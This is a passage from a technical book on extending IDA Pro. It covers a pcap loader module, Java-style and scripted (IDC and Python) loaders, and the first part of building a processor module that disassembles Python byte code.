In the preceding code, the mem2base function is new and utilized to trans-

fer content that has already been loaded into memory into the database.

The load_pcap_file function concludes by applying structure templates

wherever possible throughout the database. We must apply structure tem-

plates after creating the segment; otherwise the act of creating the segment

will remove all applied structure templates, negating all of our hard work.

The third and final portion of the function is shown here:

//...continuation of load_pcap_file

//apply headers structs for each packet in the database

for (uint32 ea = s->startEA; ea < pos;) {

uint32 pcap = ea; //start of packet

//apply pcap packet header struct

doStruct(pcap, sizeof(pcap_pkthdr), pkthdr_struct);

uint32 eth = pcap + sizeof(pcap_pkthdr);

//apply Ethernet header struct

doStruct(eth, sizeof(ether_header), ether_struct);

//Test Ethernet type field

uint16 etype = get_word(eth + 12);

etype = (etype >> 8) | (etype << 8); //htons

if (etype == ETHER_TYPE_IP) {

uint32 ip = eth + sizeof(ether_header);

//Apply IP header struct

doStruct(ip, sizeof(iphdr), ip_struct);

//Test IP protocol

uint8 proto = get_byte(ip + 9);

//compute IP header length

Binary Files and IDA Loader Modules 371

uint32 iphl = (get_byte(ip) & 0xF) * 4;

if (proto == IP_PROTO_TCP) {

doStruct(ip + iphl, sizeof(tcphdr), tcp_struct);

}

else if (proto == IP_PROTO_UDP) {

doStruct(ip + iphl, sizeof(udphdr), udp_struct);

}

//point to start of next pcak_pkthdr

ea += get_long(pcap + 8) + sizeof(pcap_pkthdr);

}

The preceding code simply steps through the database, one packet at a

time, and examines a few fields within each packet header in order to deter-

mine both the type of structure to be applied and the location of the start of

that structure. The following output represents the first few lines of a pcap

file that has been loaded into a database using the pcap loader:

.file_header:0000 _file_header segment byte public 'DATA' use16

.file_header:0000 assume cs:_file_header

.file_header:0000 pcap_file_header <0A1B2C3D4h, 2, 4, 0, 0, 0FFFFh, 1>

.file_header:0000 _file_header ends

.file_header:0000

.packets:00000018 ; =========================================================

.packets:00000018

.packets:00000018 ; Segment type: Pure data

.packets:00000018 _packets segment byte public 'DATA' use32

.packets:00000018 assume cs:_packets

.packets:00000018 ;org 18h

.packets:00000018 pcap_pkthdr <<47DF275Fh, 1218Ah>, 19Ch, 19Ch>

.packets:00000028 db 0, 18h, 0E7h, 1, 32h, 0F5h; ether_dhost

.packets:00000028 db 0, 50h, 0BAh, 0B8h, 8Bh, 0BDh; ether_shost

.packets:00000028 dw 8 ; ether_type

.packets:00000036 iphdr <45h, 0, 8E01h, 0EE4h, 40h, 80h, 6, 9E93h,

200A8C0h, 6A00A8C0h>

.packets:0000004A tcphdr <901Fh, 2505h, 0C201E522h, 6CE04CCBh, 50h,

18h, 0E01Ah, 3D83h, 0>

.packets:0000005E db 48h ; H

.packets:0000005F db 54h ; T

.packets:00000060 db 54h ; T

.packets:00000061 db 50h ; P

.packets:00000062 db 2Fh ; /

.packets:00000063 db 31h ; 1

.packets:00000064 db 2Eh ; .

.packets:00000065 db 30h ; 0

Applying structure templates in this manner, we can expand and col-

lapse any header to show or hide its individual member fields. As displayed,

it is fairly easy to observe that the byte at address 0000005E is the first byte of

an HTTP response packet.

372 Chapter 18

Having a basic loading capability for pcap files lays the groundwork for

developing plug-ins that perform more sophisticated tasks, such as TCP

stream reassembly and various other forms of data extraction. Additional

work could go into formatting various networking-related structures in a

more user-friendly manner, such as displaying readable versions of an IP

address and hosting byte-ordered displays for other fields within each

header. Such improvements are left as challenges to the reader.

Alternative Loader Strategies

If you spend some time browsing the example loaders included with the

SDK, you will find several different styles of loaders. One loader worth point-

ing out is the Java loader (<SDKDIR>/ldr/javaldr). For some file formats, the

coupling between the loader and the processor module is very loose. Once

the loader makes note of entry points into the code, the processor module

needs no additional information in order to properly disassemble the code.

Some processor modules may require substantially more information about

the original input file and may be required to perform much of the same

parsing that was previously completed by the loader. In order to avoid such

duplication of effort, a loader and a processor may be paired in a much more

tightly coupled manner. In fact, the approach taken in the Java loader is

essentially to push all loading tasks (those that would usually take place in

the loader’s load_file function) into the processor module using code similar

to the following:

static void load_file(linput_t *li, ushort neflag, const char *) {

if (ph.id != PLFM_JAVA) {

set_processor_type("java", SETPROC_ALL | SETPROC_FATAL);

}

if (ph.notify(ph.loader, li, (bool)(neflag & NEF_LOPT))) {

error("Internal error in loader<->module link");

}

In the Java loader, the only work that takes place is to verify that the

processor type is set to the Java processor, at which point the loader sends

aph.loader (defined in idp.hpp) notification message to the processor mod-

ule to inform the processor that the loading phase has been initiated. Upon

receipt of the notification, the Java processor takes over the responsibility for

loading, and in the process it derives a significant amount of internal state

information that will be reused when the processor is directed to perform its

disassembly tasks.

Whether this strategy makes sense for you depends entirely on if you are

developing both a loader and an associated processor module and if you

feel that the processor would benefit from access to the information tradition-

ally derived within the loader (segmentation, file header fields, debugging

information, and so on).

Binary Files and IDA Loader Modules 373

Another means to pass state information from the loader to the proces-

sor module involves the use of database netnodes. During the loading phase,

the loader may choose to populate specific netnodes with information that

can later be retrieved by the processor module during the disassembly phase.

Note that frequently accessing the database to retrieve information stored in

this manner may be somewhat slower than utilizing available C++ datatypes.

Writing a Scripted Loader

In IDA 5.6 Hex-Rays introduced the capability to implement loaders using

Python or IDC scripts. In the Hex Blog posting announcing this new capabil-

ity,7 Elias Bachaalany of Hex-Rays describes a loader, implemented in Python,

used to load a particular type of malicious .pdf file containing shellcode. The

nature of malicious .pdf files is such that the loader does not generalize across

all .pdf files, but the loader is an excellent example of how to load unsupported

file formats in IDA.

Scripted loaders may be implemented in either IDC or Python and

require at least two functions, accept_file and load_file, which perform

functions similar to those previously described for SDK-based loaders. An

IDC-based loader for the Simpleton file format is shown here:

#include <idc.idc>

#define SIMPLETON_MAGIC 0x1DAB00C

//Verify the input file format

// li - loader_input_t object. See IDA help file for more information

// n - How many times we have been called

//Returns:

// 0 - file unrecognized

// Name of file type - if file is recognized

static accept_file(li, n) {

auto magic;

if (n) return 0;

li.readbytes(&magic, 4, 0);

if (magic != SIMPLETON_MAGIC) {

return 0;

}

return "IDC Simpleton Loader";

}

//Load the file

// li - loader_input_t object

// neflags - refer to loader.hpp for valid flags

// format - The file format selected nby the user

//Returns:

// 1 - success

// 0 - failure

7. See http://www.hexblog.com/?p=110.

374 Chapter 18

static load_file(li, neflags, format) {

auto magic, size, base;

li.seek(0, 0);

li.readbytes(&magic, 4, 0);

li.readbytes(&size, 4, 0);

li.readbytes(&base, 4, 0);

// copy bytes to the database

loadfile(li, 12, base, size);

// create a segment

AddSeg(base, base + size, 0, 1, saRelPara, scPub);

// add the initial entry point

AddEntryPoint(base, base, "_start", 1);

return 1;

}

Other than the use of IDC functions in place of SDK functions, the simi-

larities between the IDC version of the simpleton loader and the C++ version

presented earlier should be fairly obvious. Loader scripts are installed by

copying them to <IDADIR>/loaders.

Python may also be used to develop loaders and allows for more robust

development because it offers much greater access to IDA’s underlying SDK.

Implemented in Python, the simpleton loader might look something like this.

#Verify the input file format

# li - loader_input_t object. See IDA help file for more information

# n - How many times we have been called

#Returns:

# 0 - file unrecognized

# Name of file type - if file is recognized

def accept_file(li, n):

if (n):

return 0

li.seek(0)

magic = struct.unpack("<I", li.read(4))[0]

if magic != 0x1DAB00C:

return 0

return "Python Simpleton Loader"

#Load the file

# li - loader_input_t object

# neflags - refer to loader.hpp for valid flags

# format - The file format selected nby the user

#Returns:

# 1 - success

# 0 - failure

def load_file(li, neflags, format):

li.seek(0)

(magic, size, base) = struct.unpack("<III", li.read(12))

# copy bytes to the database

li.file2base(12, base, base + size, 1)

# create a segment

add_segm(0, base, base + size, ".text", "CODE")

# add the initial entry point

Binary Files and IDA Loader Modules 375

add_entry(base, base, "_start", 1)

return 1;

One of the greatest strengths of scripting loaders (and plug-ins for that

matter) is that they allow for rapid prototyping of modules that might even-

tually be implemented using the SDK.

Summary

Once you have developed an understanding of how loaders fit into IDA’s

modular architecture, you should find that loader modules are no more diffi-

cult to create than plug-in modules. Loaders clearly have their own particular

subset of the SDK that they rely heavily on, the majority of which resides in

loader.hpp, segment.hpp, entry.hpp, and diskio.hpp. Finally, since loaders execute

before the processor module has a chance to analyze the newly loaded code,

loaders should never bother themselves with any disassembly tasks, such as

dealing with functions or disassembled instructions.

In the next chapter, we round out our discussion of IDA modules with

an introduction to processor modules, the components most responsible for

the overall formatting of a disassembled binary.

JMP

EBP

SUB

IDA PROCESSOR MODULES

The last type of IDA modules that can be

built with the SDK are processor modules,

which are by far the most complex of IDA’s

module types. Processor modules are responsi-

ble for all of the disassembly operations that take place

within IDA. Beyond the obvious conversion of machine

language opcodes into their assembly language equivalents, processor mod-

ules are also responsible for tasks such as creating functions, generating

cross-references, and tracking the behavior of the stack pointer. As it has

done with plug-ins and loaders, Hex-Rays has made it possible (beginning

with IDA 5.7) to author processor modules using one of IDA’s scripting

languages.

The obvious case that would require development of a processor module

is reverse engineering a binary for which no processor module exists. Among

other things, such a binary might represent firmware images for embedded

microcontrollers or executable images pulled from handheld devices. A less-

obvious use for a processor module might be to disassemble the instructions

of a custom virtual machine embedded within an obfuscated executable. In

378 Chapter 19

such cases, an existing IDA processor module such as the pc module for x86

would help you understand only the virtual machine itself; it would offer no

help at all in disassembling the virtual machine’s underlying byte code. Rolf

Rolles demonstrated just such an application of a processor module in a paper

posted to OpenRCE.org.1 In Appendix B of his paper, Rolf also shares his

thoughts on creating IDA processor modules; this is one of the few docu-

ments available on the subject.

In the world of IDA modules, there are an infinite number of conceiv-

able uses for plug-ins, and after scripts, plug-ins are by far the most commonly

available third-party add-ons for IDA. The need for custom loader modules

is far smaller than the need for plug-ins. This is not unexpected, as the num-

ber of binary file formats (and hence the need for loaders) tends to be much

smaller than the number of conceivable uses for plug-ins. A natural conse-

quence is that outside of modules donated to and distributed with IDA, there

tend to be relatively few third-party loader modules published. Smaller still is

the need for processor modules, as the number of instruction sets requiring

decoding is smaller than the number of file formats that make use of those

instruction sets. Here again, this leads to an almost complete lack of third-

party processor modules other than the few distributed with IDA and its

SDK. Judging by the subjects of posts to the Hex-Rays forums, it is clear that

people are working on processor modules; these modules are simply not

being released to the public.

In this chapter, we hope to shed additional light on the topic of creating

IDA processor modules and help to demystify (at least somewhat) the last of

IDA’s modular components. As a running example, we will develop a proces-

sor module to disassemble Python byte code. Since the components of a pro-

cessor module can be lengthy, it will not be possible to include complete

listings of every piece of the module. The complete source code for the Python

processor module is available on the book’s companion website. It is impor-

tant to understand that without the benefit of a Python loader module, it will

not be possible to perform fully automated disassembly of compiled .pyc files.

Lacking such a loader, you will need to load .pyc files in binary mode, select

the Python processor module, identify a likely starting point for a function,

and then convert the displayed bytes to Python instructions using EditCode.

Python Byte Code

Python2 is an object-oriented, interpreted programming language. Python

is often used for scripting tasks in a manner similar to Perl. Python source

files are commonly saved with a .py extension. Whenever a Python script is

executed, the Python interpreter compiles the source code to an internal

representation known as Python byte code.3 This byte code is ultimately

1. See “Defeating HyperUnpackMe2 With an IDA Processor Module” at http://www.openrce.org/

articles/full_view/28.

2. See http://www.python.org/.

3. See http://docs.python.org/library/dis.html#bytecodes for a complete list of Python byte code

instructions and their meanings. Also see opcode.h in the Python source distribution for a mapping

of byte code mnemonics to their equivalent opcodes.

IDA Processor Modules 379

interpreted by a virtual machine. This entire process is somewhat analogous

to the manner in which Java source is compiled to Java byte code, which is

ultimately executed by a Java virtual machine. The primary difference is that

Java users must explicitly compile their Java source into Java byte code, while

Python source code is implicitly converted to byte code every time a user

elects to execute a Python script.

In order to avoid repeated translations from Python source to Python

byte code, the Python interpreter may save the byte code representation of

a Python source file in a .pyc file that may be loaded directly on subsequent

execution, eliminating the time spent in translating the Python source. Users

typically do not explicitly create .pyc files. Instead, the Python interpreter

automatically creates .pyc files for any Python source module that is imported

by another Python source module. The theory is that modules tend to get

reused frequently, and you can save time if the byte code form of the module

is readily available. Python byte code (.pyc) files are the rough equivalent of

Java .class files.

Given that the Python interpreter does not require source code when

a corresponding byte code file is available, it may be possible to distribute

some portions of a Python project as byte code rather than as source. In such

cases, it might be useful to reverse engineer the byte code files in order to

understand what they do, just as we might do with any other binary software

distribution. This is the intended purpose of our example Python processor

module—to provide a tool that can assist in reverse engineering Python

byte code.

The Python Interpreter

A little background on the Python interpreter may be useful as we develop

the Python processor module. The Python interpreter implements a stack-

based virtual machine that is capable of executing Python byte code. By

stack-based, we mean that the virtual machine has no registers other than an

instruction pointer and a stack pointer. The majority of Python byte code

instructions manipulate the stack in some way by reading, writing, or examin-

ing stack content. The BINARY_ADD byte code instruction, for example, removes

two items from the interpreter’s stack, adds those two items together, and

places the single result value back on the top of the interpreter’s stack.

In terms of instruction set layout, Python bytes codes are relatively simple

to understand. All Python instructions consist of a single-byte opcode and

either zero or two operand bytes. The processor example presented in this

chapter does not require that you have any prior knowledge of Python byte

code. In the few instances where specific knowledge is required, we will

take the time to explain the byte code sufficiently. The primary goal of this

chapter is to provide a basic understanding of IDA processor modules and

some of the considerations that go into creating them. Python byte code is

merely used as a means to facilitate this goal.

380 Chapter 19

Writing a Processor Module Using the SDK

It wouldn’t be proper to begin a discussion of creating a processor module

without including the standard disclaimer that documentation concerning

processor modules is scarce. Other than reading through SDK include files

and the source of processor modules included with the SDK, you will find

that the SDK’s readme.txt file is the only other file that sheds any light on how

to create a processor module, with a few notes under the heading “Descrip-

tion of processor modules.”

It is worth clarifying that while the README file references specific file-

names within a processor module as if those filenames are set in stone, in

fact they are not. They do, however, tend to be the filenames that are used

in the included SDK examples, and they are also the filenames referenced in

the build scripts included with those examples. Feel free to create your pro-

cessor modules using any filenames you like, as long as you update your build

scripts accordingly.

The general intent of referring to specific processor files is to convey the

idea that a processor module consists of three logical components: an analyzer,

an instruction emulator, and an output generator. We will cover the purpose of

each of these functional components as we work our way through the cre-

ation of our Python processor module.

Several example processors can be found in <SDKDIR>/module. One of

the simpler processors to read through (if there is such a thing) is the z8 pro-

cessor. Other processor modules vary in complexity based on their instruc-

tion sets and whether they take on any of the loading responsibilities. If you

are thinking about writing your own processor module, one approach for

getting started (recommended by Ilfak in the README file) is to copy an

existing processor module and modify it to suit your needs. In such cases,

you will want to find the processor module that most closely resembles the

logical structure (not necessarily the processor architecture) that you envi-

sion for your module.

The processor_t Struct

As with plug-ins and loaders, processor modules export exactly one thing.

For processors, that one thing is a processor_t struct that must be named

LPH. This struct is exported automatically if you include <SDKDIR>/module/

idaidp.hpp, which in turn includes many other SDK header files commonly

required by processor modules. One of the reasons why writing a processor

module is so challenging is that the processor_t struct contains 56 fields that

must be initialized, and 26 of those fields are function pointers, while 1 of

the fields is a pointer to an array of one or more struct pointers that each

point to a different type of struct (asm_t) that contains 59 fields requiring

initialization. Easy enough, right? One of the principle inconveniences in

building processor modules revolves around initializing all of the required

static data, a proccess that can be error prone because of the large number of

IDA Processor Modules 381

fields within each data structure. This is one of the reasons why Ilfak recom-

mends using an existing processor as the basis for any new processors you

develop.

Because of the complexity of these data structures, we will not attempt to

enumerate every possible field and its uses. Instead, we will highlight the major

fields and refer you to idp.hpp for further details on these and other fields

within each structure. The order in which we cover various processor_t fields

bears no resemblance to the order in which those fields are declared within

processor_t.

Basic Initialization of the LPH Structure

Before diving into the behavioral aspects of your processor module, there

are some static data requirements that you should take care of. As you build

a disassembly module, you need to create a list of every assembly language

mnemonic that you intend to recognize for your target processor. This list is

created in the form of an array of instruc_t (defined in idp.hpp) structures

and is commonly placed in a file named ins.cpp. As shown here, instruc_t is

a simple structure whose purpose is twofold. First, it provides a table lookup

for instruction mnemonics. Second, it describes some basic characteristics of

each instruction.

struct instruc_t {

const char *name; //instruction mnemonic

ulong feature; //bitwise OR of CF_xxx flags defined in idp.hpp

};

The feature field is used to indicate behaviors such as whether the instruc-

tion reads or writes any of its operands and how execution continues once

the instruction is executed (default, jump, call). The CF in CF_xxx stands for

canonical feature. The feature field basically drives the concepts of control flow

and cross-references. A few of the more interesting canonical feature flags

are described here:

CF_STOP The instruction does not pass control to the following instruction.

Examples might include absolute jumps or function-return instructions.

CF_CHGn The instruction modifies operand n, where n is in the range 1..6.

CF_USEn The instruction uses operand n, where n is in the range 1..6, and

uses means “reads” or “refers to” (but does not modify; see CF_CHGn) a

memory location.

CF_CALL The instruction calls a function.

Instructions need not be listed in any particular order. In particular,

there is no need to order instructions according to their associated binary

opcodes, nor is there any requirement to have a one-to-one correspondence

382 Chapter 19

between the instructions in this array and valid binary opcodes. The first and

last few lines of our example instruction array are shown here:

instruc_t Instructions[] = {

{"STOP_CODE", CF_STOP}, /* 0 */

{"POP_TOP", 0}, /* 1 */

{"ROT_TWO", 0}, /* 2 */

{"ROT_THREE", 0}, /* 3 */

{"DUP_TOP", 0}, /* 4 */

{"ROT_FOUR", 0}, /* 5 */

X {NULL, 0}, /* 6 */

...

{"CALL_FUNCTION_VAR_KW", CF_CALL}, /* 142 */

{"SETUP_WITH", 0}, /* 143 */

{"EXTENDED_ARG", 0}, /* 145 */

{"SET_ADD", 0}, /* 146 */

{"MAP_ADD", 0} /* 147 */

};

In our example, because Python byte code is so simple, we will be main-

taining a one-to-one correspondence between instructions and byte codes.

Note that in order to do so, some instruction records must act as filler when

an opcode is not defined, such as opcode 6 X in this case.

An associated set of enumerated constants is typically defined in ins.hpp

to provide a mapping from integers to instructions, as shown here:

enum python_opcodes {

STOP_CODE = 0,

POP_TOP = 1, //remove top item on stack

ROT_TWO = 2, //exchange top two items on stack

ROT_THREE = 3, //move top item below the 2nd and 3rd items

DUP_TOP = 4, //duplicate the top item on the stack

ROT_FOUR = 5, //move top item below the 2nd, 3rd, and 4th items

NOP = 9, //no operation

...

CALL_FUNCTION_VAR_KW = 142,

SETUP_WITH = 143,

EXTENDED_ARG = 145,

SET_ADD = 146,

MAP_ADD = 147,

PYTHON_LAST = 148

};

Here we have elected to explicitly assign a value to each enum, both for

clarity’s sake and because there are gaps in our sequence because we have

elected to use the actual Python opcodes as our instruction indexes. An

additional constant has also been added (PYTHON_LAST) to provide easy refer-

ence to the end of the list. With a list of instructions and associated integer

IDA Processor Modules 383

mapping in hand, we have sufficient information to initialize three fields of

LPH (our global processor_t). These three fields are described here:

int instruc_start; // integer code of the first instruction

int instruc_end; // integer code of the last instruction + 1

instruc_t *instruc; // array of instructions

We must initialize these fields with STOP_CODE, PYTHON_LAST, and Instructions,

respectively. Together these fields enable a processor module to quickly look

up the mnemonic for any instruction in the disassembly.

For most processor modules, we also need to define a set of register names

and an associated set of enumerated constants for referring to them. If we

were writing an x86 processor module, we might begin with something like

the following, where for the sake of brevity we restrict ourselves to the basic

x86 register set:

static char *RegNames[] = {

"eax", "ebx", "ecx", "edx", "edi", "esi", "ebp", "esp",

"ax", "bx", "cx", "dx", "di", "si", "bp", "sp",

"al", "ah", "bl", "bh", "cl", "ch", "dl", "dh",

"cs", "ds", "es", "fs", "gs"

};

The RegNames array is often declared in a file named reg.cpp. This file is

also where the sample processor modules declare LPH, which enables RegNames

to be declared statically. The associated register enumeration would be

declared in a header file, usually named after the processor (perhaps x86.hpp

in this case), as follows:

enum x86_regs {

r_eax, r_ebx, r_ecx, r_edx, r_edi, r_esi, r_ebp, r_esp,

r_ax, r_bx, r_cx, r_dx, r_di, r_si, r_bp, r_sp,

r_al, r_ah, r_bl, r_bh, r_cl, r_ch, r_dl, r_dh,

r_cs, r_ds, r_es, r_fs, r_gs

};

Make certain that you maintain the proper correspondence between the

name array and the enumerated register constants allow a processor module

to quickly look up register names when formatting instruction operands.

These two data declarations are used to initialize additional fields in LPH:

int regsNum; // total number of registers

char **regNames; // array of register names

These two fields are often initialized with qnumber(RegNames) and RegNames,

respectively, where qnumber is a macro, defined in pro.h, that computes the

number of elements in a statically allocated array.

384 Chapter 19

An IDA processor module is always required to specify information about

segment registers regardless of whether the actual processor uses segment

registers or not. Since the x86 utilizes segment registers, the preceding exam-

ple is fairly straightforward to configure. Segment registers are configured in

the following fields within a processor_t:

X// Segment register information (use virtual CS and DS registers if

// your processor doesn't have segment registers):

int regFirstSreg; // number of first segment register

int regLastSreg; // number of last segment register

int segreg_size; // size of a segment register in bytes

Y // If your processor does not use segment registers, You should define

// 2 virtual segment registers for CS and DS.

// Let's call them rVcs and rVds.

int regCodeSreg; // number of CS register

int regDataSreg; // number of DS register

To initialize our hypothetical x86 processor module, the previous five

fields would be initialized, in order, as follows:

r_cs, r_gs, 2, r_cs, r_ds

Note the comments, X and Y, regarding segment registers. IDA always

wants information about segment registers, even if your processor does not

use them. Returning to our Python example, we don’t have nearly as much

work to do in setting up register mappings, since the Python interpreter is a

stack-based architecture and there are no registers, but we do need to deal

with the segment register issue. The typical approach for doing so is to make

up names and enumerated values to represent a minimal set of segment reg-

isters (code and data). Basically, we are faking the existence of segment regis-

ters for no other reason than because IDA expects them. However, even

though IDA expects them, we are by no means obligated to use them, so we

simply ignore them in our processor module. For our Python processor, we

do the following:

//in reg.cpp

static char *RegNames = { "cs", "ds" };

//in python.hpp

enum py_registers { rVcs, rVds };

With these declarations in place, we can return to initialize the appropri-

ate fields within LPH using the following sequence of values:

rVcs, rVds, 0, rVcs, rVds

IDA Processor Modules 385

Before moving on to the implementation of any behavior in the Python

processor, we take some time to knock off some remaining low-hanging fruit

where initialization of the LPH structure is concerned. The first five fields of a

processor_t are described here:

int version; // should be IDP_INTERFACE_VERSION

int id; // IDP id, a PLFM_xxx value or self assigned > 0x8000

ulong flag; // Processor features, bitwise OR of PR_xxx values

int cnbits; // Number of bits in a byte for code segments (usually 8)

int dnbits; // Number of bits in a byte for data segments (usually 8)

The version field should look familiar, as it is also required in plug-in and

loader modules. For custom processor modules, the id field should be a self-

assigned value greater than 0x8000. The flag field describes various charac-

teristics of the processor module as a combination of PR_xxx flags defined

in idp.hpp. For the Python processor, we choose to specify only PR_RNAMESOK,

which allows register names to be used as location names (which is okay since

we have no registers), and PRN_DEC, which sets the default number display for-

mat to decimal. The remaining two fields, cnbits and dnbits, are each set to 8.

The Analyzer

At this point we have filled in enough of the LPH structure that we can begin

thinking about the first portion of a processor module that will execute—the

analyzer. In the example processor modules, the analyzer is typically imple-

mented by a function named ana (you may name it anything you like) in a file

named ana.cpp. The prototype for this function is very simple, as shown here:

int idaapi ana(void); //analyze one instruction and return the instruction length

You must initialize the u_ana member of the LPH object with a pointer to

your analyzer function. The analyzer’s job is to analyze a single instruction,

populate the global variable cmd with information about the instruction, and

return the length of the instruction. The analyzer should not make any

changes to the database.

The cmd variable is a global instance of an insn_t object. The insn_t class,

defined in ua.hpp, is used to describe a single instruction in the database. Its

declaration is shown here:

class insn_t {

public:

ea_t cs; // Current segment base paragraph. Set by kernel

ea_t ip; // Virtual address of instruction (within segment). Set by kernel

ea_t ea; // Linear address of the instruction. Set by kernel

X uint16 itype; // instruction enum value (not opcode!). Proc sets this in ana

Y uint16 size; // Size of instruction in bytes. Proc sets this in ana

union { // processor dependent field. Proc may set this

uint16 auxpref;

struct {

uchar low;

386 Chapter 19

uchar high;

} auxpref_chars;

};

char segpref; // processor dependent field. Proc may set this

char insnpref; // processor dependent field. Proc may set this

Z op_t Operands[6]; // instruction operand info. Proc sets this in ana

char flags; // instruction flags. Proc may set this

};

Prior to calling your analyzer function, the IDA kernel (the core of IDA)

fills in the first three fields of the cmd object with the segmented and linear

address of the instruction. After that, it is the analyzer’s job to fill in the

rest. The essential fields for the analyzer to fill in are itype X, size Y, and

Operands Z. The itype field must be set to one of the enumerated instruction

type values discussed previously. The size field must be set to the total size

of the instruction (in bytes) and should be used as the return value of the

instruction. If the instruction cannot be parsed, the analyzer should return a

size of zero. Finally, an instruction may have up to six operands, and the ana-

lyzer should fill in information about each operand used by the instruction.

The analyzer function is often implemented using a switch statement.

The first step in the analyzer is typically to request one or more (depending

on the processor) bytes from the instruction stream and use those bytes as

the switch test variable. The SDK offers special functions for use in the ana-

lyzer for the purpose of retrieving bytes from the instruction stream. These

functions are shown here:

//read one byte from current instruction location

uchar ua_next_byte(void);

//read two bytes from current instruction location

ushort ua_next_word(void);

//read four bytes from current instruction location

ulong ua_next_long(void);

//read eight bytes from current instruction location

ulonglong ua_next_qword(void);

The current instruction location is initially the same value contained

in cmd.ip. Each call to one of the ua_next_xxx functions has the side effect of

incrementing cmd.size according to the number of bytes requested by the

ua_next_xxx function being called (1, 2, 4, or 8). The retrieved bytes must

be decoded enough to assign the appropriate instruction type enumerated

value into the itype field, determine the number and type of any operands

required by the instruction, and then determine the overall length of the

instruction. As the decoding process progresses, additional instruction bytes

may be required until a complete instruction has been retrieved from the

instruction stream. As long as you utilize the ua_next_xxx function, cmd.size

will be updated automatically for you, eliminating the need to keep track of

the number of bytes you have requested for a given instruction. From a high-

level perspective, the analyzer somewhat mimics the instruction fetch and

instruction decode phases employed in real CPUs. Mirroring real life, instruc-

tion decoding tends to be easier for processors with fixed instruction sizes, as

IDA Processor Modules 387

is often the case with RISC-style architectures, while instruction decoding

tends to be more complicated for processors that use variable-length instruc-

tions, such as the x86.

Using the retrieved bytes, the analyzer must initialize one element in the

cmd.Operands array for each operand used by the instruction. Instruction oper-

ands are represented using instances of the op_t class, which is defined in

ua.hpp and summarized here:

class op_t {

public:

char n; // number of operand (0,1,2). Kernel sets this do not change!

optype_t type; // type of operand. Set in ana, See ua.hpp for values

// offset of operand relative to instruction start

char offb; //Proc sets this in ana, set to 0 if unknown

// offset to second part of operand (if present) relative to instruction

start

char offo; //Proc sets this in ana, set to 0 if unknown

uchar flags; //Proc sets this in ana. See ua.hpp for possible values

char dtyp; // Specifies operand datatype. Set in ana. See ua.hpp for values

// The following unions keep other information about the operand

union {

uint16 reg; // number of register for type o_reg

uint16 phrase; // number of register phrase for types o_phrase and o_displ

// define numbers of phrases as you like

};

union { // value of operand for type o_imm or

uval_t value; // outer displacement (o_displ+OF_OUTER_DISP)

struct { // Convenience access to halves of value

uint16 low;

uint16 high;

} value_shorts;

};

union { // virtual address pointed or used by the operand

ea_t addr; // for types (o_mem,o_displ,o_far,o_near)

struct { // Convenience access to halves of addr

uint16 low;

uint16 high;

} addr_shorts;

};

//Processor dependent fields, use them as you like. Set in ana

union {

ea_t specval;

struct {

uint16 low;

uint16 high;

} specval_shorts;

388 Chapter 19

};

char specflag1, specflag2, specflag3, specflag4;

};

Configuring an operand begins with setting the operand’s type field to

one of the enumerated optype_t constants defined in ua.hpp. An operand’s

type describes the source or destination of the operand data. In other words,

the type field roughly describes the addressing mode employed to access the

operand. Examples of operand types include o_reg, which means that the

operand is the content of a register; o_mem, which means the operand is a

memory address known at compile time; and o_imm, which means that the

operand is immediate data contained within the instruction.

The dtype field specifies the size of the operand data. This field should

be set to one of the dt_xxx values specified in ua.hpp. Example values include

dt_byte for 8-bit data, dt_word for 16-bit data, and dt_dword for 32-bit data.

The following x86 instructions demonstrate the correspondence of some

of the primary operand datatypes to commonly used operands:

mov eax, 0x31337 ; o_reg(dt_dword), o_imm(dt_dword)

push word ptr [ebp - 12] ; o_displ(dt_word)

mov [0x08049130], bl ; o_mem(dt_byte), o_reg(dt_byte)

movzx eax, ax ; o_reg(dt_dword), o_reg(dt_word)

ret ; o_void(dt_void)

The manner in which the various unions within an op_t are used is dic-

tated by the value of the type field. For example, when an operand is type

o_imm, the immediate data value should be stored into the value field, and

when the operand type is o_reg, the register number (from the enumerated

set of register constants) should be stored into the reg field. Complete details

on where to store each piece of an instruction are contained in ua.hpp.

Note that none of the fields within an op_t describe whether the operand

is being used as a source or a destination for data. In fact, it is not the ana-

lyzer’s job to determine such things. The canonical flags specified in the

instruction names array are used in a later stage in the processor to deter-

mine exactly how an operand is being used.

Several of the fields within both the insn_t class and the op_t class are

described as processor dependent, which means that you may use those fields for

any purpose you wish. Such fields are often used for storing information that

does not fit neatly into one of the other fields within these classes. The pro-

cessor-dependent fields are also a convenient mechanism for passing infor-

mation along to later stages of the processor so that those stages do not need

to replicate the work of the analyzer.

With all of the ground rules for an analyzer covered, we can take a stab

at crafting a minimal analyzer for Python byte code. Python byte code is very

straightforward. Python opcodes are 1 byte long. Opcodes less than 90 have

IDA Processor Modules 389

no operands, while opcodes greater than or equal to 90 each have a 2-byte

operand. Our basic analyzer is shown here:

#define HAVE_ARGUMENT 90

int idaapi py_ana(void) {

cmd.itype = ua_next_byte(); //opcodes ARE itypes for us (updates cmd.size)

if (cmd.itype >= PYTHON_LAST) return 0; //invalid instruction

if (Instructions[cmd.itype].name == NULL) return 0; //invalid instruction

if (cmd.itype < HAVE_ARGUMENT) { //no operands

cmd.Op1.type = o_void; //Op1 is a macro for Operand[0] (see ua.hpp)

cmd.Op1.dtyp = dt_void;

}

else { //instruction must have two bytes worth of operand data

if (flags[cmd.itype] & (HAS_JREL | HAS_JABS)) {

cmd.Op1.type = o_near; //operand refers to a code location

}

else {

cmd.Op1.type = o_mem; //operand refers to memory (sort of)

}

cmd.Op1.offb = 1; //operand offset is 1 byte into instruction

cmd.Op1.dtyp = dt_dword; //No sizes in python so we just pick something

cmd.Op1.value = ua_next_word(); //fetch the operand word (updates cmd.size)

cmd.auxpref = flags[cmd.itype]; //save flags for later stages

if (flags[cmd.itype] & HAS_JREL) {

//compute relative jump target

cmd.Op1.addr = cmd.ea + cmd.size + cmd.Op1.value;

}

else if (flags[cmd.itype] & HAS_JABS) {

cmd.Op1.addr = cmd.Op1.value; //save absolute address

}

else if (flags[cmd.itype] & HAS_CALL) {

//target of call is on the stack in Python, the operand indicates

//how many arguments are on the stack, save these for later stages

cmd.Op1.specflag1 = cmd.Op1.value & 0xFF; //positional parms

cmd.Op1.specflag2 = (cmd.Op1.value >> 8) & 0xFF; //keyword parms

}

return cmd.size;

}

For the Python processor module, we have elected to create an addi-

tional array of flags, one per instruction, used to supplement (and in some

cases replicate) the canonical features of each instruction. The HAS_JREL,

HAS_JABS, and HAS_CALL flags were defined for use in our flags array. We use

these flags to indicate whether an instruction operand represents a relative

jump offset, an absolute jump target, or the description of a function call

stack, respectively. Explaining every detail of the analysis phase is difficult

390 Chapter 19

